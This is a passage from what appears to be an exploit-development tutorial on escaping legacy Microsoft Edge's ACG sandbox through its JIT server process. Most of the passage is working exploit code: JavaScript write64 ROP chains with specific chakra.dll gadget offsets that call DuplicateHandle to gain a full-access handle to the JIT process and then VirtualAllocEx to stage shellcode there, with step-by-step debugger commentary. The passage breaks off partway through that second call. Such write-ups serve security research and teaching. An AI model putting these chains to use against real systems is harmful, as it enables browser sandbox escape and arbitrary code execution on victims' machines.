// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

This brings our DuplicateHandle call to the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	-
	-
	-
	-
);

The next ROP gadget sequence contains an interesting item. The next item on our agenda will be to provide DuplicateHandle with an “output buffer” to write the new duplicated-handle (when the call to DuplicateHandle occurs). We achieve this by providing a memory address, which is writable, in R9. The address we will use is an empty address within the .data section of chakra.dll. We achieve this with the following ROP gadget:

mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret

As we can see, we load the address we want to place in R9 within RCX. The mov r9, rcx instruction will load our intended “output buffer” within R9, setting up our call to DuplicateHandle properly. However, there are some residual instructions we need to deal with - most notably the cmp r8d, [rax] instruction. As we can see, this instruction will dereference RAX (e.g. extract the contents that the value in RAX points to) and compare it to r8d. We don’t necessarily care about the cmp instruction so much as we do about the fact that RAX is dereferenced. This means in order for this ROP gadget to work properly, we need to load a valid pointer in RAX. In this exploit, we just choose a random address within the chakra.dll address space. Do not over think as to “why did Connor choose this specific address”. This could literally be any address!

As we can see, RAX now has a valid pointer in it. Moving our, our next ROP gadget is a pop rcx ; ret gadget. As previously mentioned, we load the actual value we want to pass into DuplicateHandle via the R9 register into RCX. A future ROP gadget will copy RCX into the R9 register.

Our .data address of chakra.dll is loaded into RCX. This memory address is where our PROCESS_ALL_ACCESS handle to the JIT server will be located after our call to DuplicateHandle.

Now that we have prepared RAX with a valid pointer and prepared RCX with the address we want DuplicateHandle to write our PROCESS_ALL_ACCESS handle to, we hit the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget.

We have successfully copied our output “buffer”, which will hold our full-permissions handle to the JIT server after the DuplicateHandle call into R9. Next up, we can see the cmp r8d, dword ptr [rax] instruction. WinDbg now shows that the dereferenced contents of RAX contains some valid contents - meaning RAX was successfully prepared with a pointer to “bypass” this cmp check. Essentially, we ensure we don’t incur an access violation as a result of an invalid address being dereferenced by RAX.

The next item on the agenda is the je instruction - which essentially performs the jump to the specified address above (chakra!Js::InternalStringComparer::Equals+0x28) if the result of subtracting EAX, a 32-bit register (referenced via dword ptr [rax], meaning essentially EAX) from R8D (a 32-bit register) is 0. As we know, we already prepared R8 with a value of 0xffffffffffffffff - meaning the jump won’t take place, as 0xffffffffffffffff - 0x7fff3d82e010 does not equal zero. After this, an add rsp, 0x28 instruction occurs - and, as we saw in our ROP gadget snippet at the beginning of this section of the blog, we pad the stack with 0x28 bytes to ensure execution returns into the next ROP gadget, and not into something we don’t intend it to (e.g. 0x28 bytes “down” the stack without any padding).

Our call to DuplicateHandle is now at the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	-
	-
	-
);

Since RDX, R8, and R9 are taken care of - we can finally fill in RCX with the handle to the JIT server that is currently within the s_jitManager. This is an “easy” ROP sequence - as the handle is stored in a global variable s_jitManager + 0x8 and we can just place it on the stack and pop it into RCX with a pop rcx ; ret gadget. We have already used our arbitrary read to leak the raw handle value (in this case it is 0xa64, but is subject to change on a per-process basis).

You may notice above the value of the stack changed. This is simply because I restarted Edge, and as we know - the stack changes on a per-process basis. This is not a big deal at all - I just wanted to make note to the reader.

After the pop rcx instruction - the PROCESS_DUP_HANDLE handle to the JIT server is stored in RCX.

Our call to DuplicateHandle is now at the following state:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	-
	-
	-
);

Per the __fastcall calling convention, every argument after the first four are placed onto the stack. Because we have an arbitrary write primitive, we can just directly write our next 3 arguments for DuplicateHandle to the stack - we don’t need any ROP gadgets to pop any further arguments. With this being said, we will go ahead and continue to use our ROP chain to actually place DuplicateHandle into the RAX register. We then will perform a jmp rax instruction to kick our function call off. So, for now, let’s focus on getting the address of kernelbase!DuplicateHandle into RAX. This begins with a pop rax instruction. As we can see below, RAX, after the pop rax, contains kernelbase!DuplicateHandle.

After RAX is filled with kernelbase!DuplicateHandle, the jmp rax instruction is queued for execution.

Let’s quickly recall our ROP chain snippet.

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

Let’s break down what we are seeing above:

  1. RAX contains kernelbase!DuplicateHandle
  2. kernelbase!DuplicateHandle is a function. When it is called legitimately, it ends in a ret instruction to return execution to where it was called (this is usually a return to the stack)
  3. Our “return” address jumps over our “shadow space”. Remember, __fastcall requires the 5th parameter, and subsequent parameters, begin at RSP + 0x20, RSP + 0x28, RSP + 0x38, etc. The space between RSP and RSP + 0x20, which is unused, is referred to as “shadow space”
  4. Our final three parameters are written directly to the stack

Step one is very self explanatory. Let’s explain steps two through four quickly. When DuplicateHandle is called legitimately, execution can be seen below.

Prior to the call:

After the call:

Notice what our call instruction does under the hood. call pushes the return address on the stack for DuplicateHandle. When this push occurs, it also changes the state of the stack so that every item is pushed down 0x8 bytes. Essentially, when call happens RSP becomes RSP + 0x8, and so forth. This is very important to us.

Recall that we do not actually call DuplicateHandle. Instead, we perform a jmp to it. Since we are using jmp, this doesn’t push a return address onto the stack for execution to return to. Because of this, we supply our own return address located at RSP when the jmp occurs - this “mimics” what call does. Additionally, this also means we have to push our last three parameters 0x8 bytes down the stack. Again, call would normally do this for us - but since call isn’t used here, we have to manually add our return address an manually increment the stack by 0x8. This is because although __fastcall requires 5th and subsequent parameters to start at RSP + 0x20, internally the calling convention knows when the call is performed, the parameters will actually be shifted by 0x8 bytes due to the pushed ret address on the stack. So tl;dr - although __fastcall says we put parameters at RSP + 0x20, we actually need to start them at RSP + 0x28.

The above will be true for all subsequent ROP chains.

So, after we get DuplicateHandle into RAX we then can directly write our final three arguments directly to the stack leveraging our arbitrary write primitive.

Our call to DuplicateHandle is in its final state:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS
);

From here, we should be able to step into the function call to DuplicateHandle, execute it.

We can use pt to tell WinDbg to execute DuplicateHandle and pause when we hit the ret to exit the function

At this point, our call should have been successful! As we see above, a value was placed in our “output buffer” to receive the duplicated handle. This value is 0x0000000000000ae8. If we run Process Hacker as an administrator, we can confirm that this is a handle to the JIT server with PROCESS_ALL_ACCESS!

Now that our function has succeeded, we need to make sure we return back to the stack in a manner that allows us to keep execution our ROP chain.

When the ret is executed we hit our “fake return address” we placed on the stack before the call to DuplicateHandle. Our return address will simply jump over the shadow space and our last three DuplicateHandle parameters, and allow us to keep executing further down the stack (where subsequent ROP chains will be).

At this point we have successfully obtained a PROCESS_ALL_ACCESS handle to the JIT server process. With this handle, we can begin the process of compromising the JIT process, where ACG is disabled.

VirtualAllocEx ROP Chain

Now that we possess a handle to the JIT server with enough permissions to perform things like memory operations, let’s now use this PROCESS_ALL_ACCESS handle to allocate some memory within the JIT process. However, before examining the ROP chain, let’s recall the prototype for VirtualAllocEx:

The function call will be as follows for us:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable
);

Let’s firstly break down why our call to VirtualAllocEx is constructed the way it is. The call to the function is very straight forward - we are essentially allocating a region of memory the size of our shellcode in the JIT process using our new handle to the JIT process. The main thing that sticks out to us is the PAGE_READWRITE allocation protection. As we recall, the JIT process doesn’t have ACG enabled - meaning it is quite possible to have dynamic RWX memory in such a process. However, there is a slight caveat and that is when it comes to remote injection. ACG is documented to let processes that don’t have ACG enabled to inject RWX memory into a process which does have ACG enabled. After all, ACG was created with Microsoft Edge in mind. Since Edge uses an out-of-process JIT server architecture, it would make sense that the process not protected by ACG (the JIT server) can inject into the process with ACG (the content process). However, a process with ACG cannot inject into a process without ACG using RWX memory. Because of this, we actually will place our shellcode into the JIT server using RW permissions. Then, we will eventually copy a ROP chain into the JIT process which marks the shellcode as RWX. This is possible, as ACG is disabled. The main caveat here is that it cannot directly and remotely be marked as RWX. At first, I tried allocating with RWX memory, thinking I could just do simple process injection. However, after testing and the API call failing, it turns our RWX memory can’t directly be allocated when the injection stems from a process protected by ACG to a non-ACG process. This will all make more sense later, if it doesn’t now, when we copy our ROP chain in to the JIT process.

Here is the ROP chain we will be working with (we will include our DuplicateHandle chain for continuity. Every ROP chain from here on out will be included with the previous one to make readability a bit better):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Let’s start by setting a breakpoint on our first ROP gadget of pop rax ; ret, which is located at chakra_base + 0x577fd4. Our DuplicateHandle ROP chain uses this gadget two times. So, when we hit our breakpoint, we will hit g in WinDbg to jump over these two calls in order to debug our VirtualAllocEx ROP chain.

This ROP chain starts out by attempting to act on the R9 register to load in the flAllocationType parameter. This is done via the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget. As we previously discussed, the RCX register is used to copy the final parameter into R9. This means we need to place MEM_COMMIT | MEM_RESERVE into the RCX register, and let our target gadget copy the value into R9. However, we know that the RAX register is dereferenced. This means our first few gadgets:

  1. Place a valid pointer in RAX to bypass the cmp r8d, [rax] check
  2. Place 0x3000 (MEM_COMMIT | MEM_RESERVE) into RCX
  3. Copy said value in R9 (along with an add rsp, 0x28 which we know how to deal with by adding 0x28 bytes of padding)

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	-
	-
	-
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

After R9 gets filled properly, our next step is to work on the dwSize parameter, which will go in R8. We can directly copy a value into R8 using the following ROP gadget: mov r8, rdx ; add rsp, 0x48 ; ret. All we have to do is place our intended value into RDX prior to this gadget, and it will be copied into R8 (along with an add rsp, 0x48 - which we know how to deal with by adding some padding before our ret). The value we are going to place in R9 is 0x1000 which isn’t the exact size of our shellcode, but it will give us a good amount of space to work with as 0x1000 is more room than we actually need.

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	-
	-
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

The next parameter we will focus on is the lpAddress parameter. In this case, we are setting this value to NULL (or 0 in our case), as we want the OS to determine where our private allocation will be within the JIT process. This is done by simply popping a 0 value, which we can directly write to the stack after our pop rdx gadget using the write primitive, into RDX.

After executing the above ROP gadgets, our call to VirtualAllocEx is in the following state:

VirtualAllocEx(
	-
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

At this point we have supplied 3/5 arguments for VirtualAllocEx. Our second-to-last parameter will be the hProcess parameter - which is our now duplicated-handle to the JIT server with PROCESS_ALL_ACCESS permissions. Here is how this code snippet looks:

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

We can notice two things here - recall we stored the handle in an empty address within .data of chakra.dll. We simply can pop this pointer into RCX, and then dereference it to get the raw handle value. This arbitrary dereference gadget, where we can extract the value RCX points to, is followed by a write operation at the memory address in RAX + 0x20. Recall we already have placed a writable address into RAX, so we simply can move on knowing we “bypass” this instruction, as the write operation won’t cause an access violation - the memory in RAX is already writable.

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

The last thing we need to do is twofold:

  1. Place VirtualAllocEx into RAX
  2. Directly write our last parameter at RSP + 0x28 (we have already explained why RSP + 0x28 instead of RSP + 0x20) (this is done via our arbitrary write and not via a ROP gadget)
  3. jmp rax to kick off the call to VirtualAllocEx

Again, as a point of reiteration, we can see we simply can just write our last parameter to RSP + 0x28 instead of using a gadget to mov [rsp+0x28], reg.

write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();

When this occurs, our call will be in the following (final) state:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
